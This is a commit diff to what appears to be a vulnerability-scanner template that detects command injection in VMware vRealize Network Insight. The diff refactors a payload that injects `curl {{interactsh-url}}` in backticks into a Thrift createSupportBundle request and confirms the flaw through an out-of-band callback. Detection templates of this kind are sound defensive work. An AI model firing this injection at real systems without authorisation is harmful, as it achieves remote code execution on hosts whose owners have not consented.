commit
85762056d9
|
@ -24,6 +24,9 @@ info:
|
|||
fofa-query: title="VMware vRealize Network Insight"
|
||||
tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast
|
||||
|
||||
variables:
|
||||
cmd: "curl {{interactsh-url}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
|
@ -31,20 +34,27 @@ http:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-thrift
|
||||
|
||||
[1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl {{interactsh-url}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]
|
||||
[1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`{{cmd}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- createSupportBundle
|
||||
- '{"rec":'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/x-thrift"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Provided invalid node Id"
|
||||
- "Invalid nodeId"
|
||||
negative: true
|
||||
|
|
Loading…
Reference in New Issue